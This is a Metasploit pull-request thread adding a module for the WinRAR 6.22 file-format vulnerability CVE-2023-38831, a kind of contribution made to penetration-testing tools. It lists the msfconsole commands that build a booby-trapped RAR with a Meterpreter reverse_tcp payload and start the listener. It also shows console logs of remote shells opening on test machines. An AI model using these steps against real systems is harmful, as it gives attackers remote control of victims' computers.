WinRAR 6.22 (CVE-2023-38831)

[xaitax]

Verification

• Start msfconsole
• Do: use exploit/windows/fileformat/winrar_cve_2023_38831
• Do: set PAYLOAD windows/meterpreter/reverse_tcp
• Do: set LHOST 192.168.100.100
• Do: set LPORT 1234
• Do: set INPUT_FILE /tmp/winrar_exploit.pdf
• Do: exploit

[+] Created /root/.msf4/local/poc.rar

• Start msfconsole
• Do: use exploit/multi/handler
• Do: set PAYLOAD windows/meterpreter/reverse_tcp
• Do: set LHOST 192.168.100.100
• Do: set LPORT 1234
• Do: run

Target:

• Install WinRAR 6.22 on Windows 10/11
• Open OUTPUT_FILE
• Click on INPUT_FILE within archive
• Enjoy Shell

PoC:

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[xaitax]

Linting should be fixed as well working with Dir.mktmpdir do |temp_dir|

[bwatters-r7]

Are we space constrained?

[xaitax]

Thank you @bwatters-r7 . Good point. I don't think so. In the beginning I put it in to be on the safe side but looking at the research we probably aren't. I can take it out and re-test if you want.

[bwatters-r7]

Sure! I downloaded the software and was hoping to get this tested today.

[xaitax]

@bwatters-r7 Confirmed it to be still working with the same options/settings as before but payload space removed. Thanks for the hint.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 46.165.244.xxx:1234
[*] Sending stage (175686 bytes) to 178.238.172.xxx
[*] Meterpreter session 1 opened (46.165.244.xxx:1234 -> 178.238.172.xxx:41032) at 2023-09-07 19:58:46 +0200

meterpreter > getuid
Server username: W00T\ah

[bwatters-r7]

I realized the way you'd written this created a malformed 64-bit payload, so it crashed when you used a 64-bit payload. These changes will allow the module to properly create and deploy a 64-bit payload and let it autocomplete 64-bit payload names when you go to set them.

[xaitax]

Much appreciated @bwatters-r7
Works for me on x64 as well now. Sorry for not testing that earlier.

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     46.165.244.xxx   yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 46.165.244.xxx:1234
[*] Sending stage (200774 bytes) to 178.238.172.xxx
[*] Meterpreter session 1 opened (46.165.244.xxx:1234 -> 178.238.172.xxx:49080) at 2023-09-07 22:01:33 +0200

meterpreter > getuid
Server username: W00T\ah

[bwatters-r7]

No problem, @xaitax. Everything looks great.

[bwatters-r7]

Release Notes

This PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting Winrar 6.22.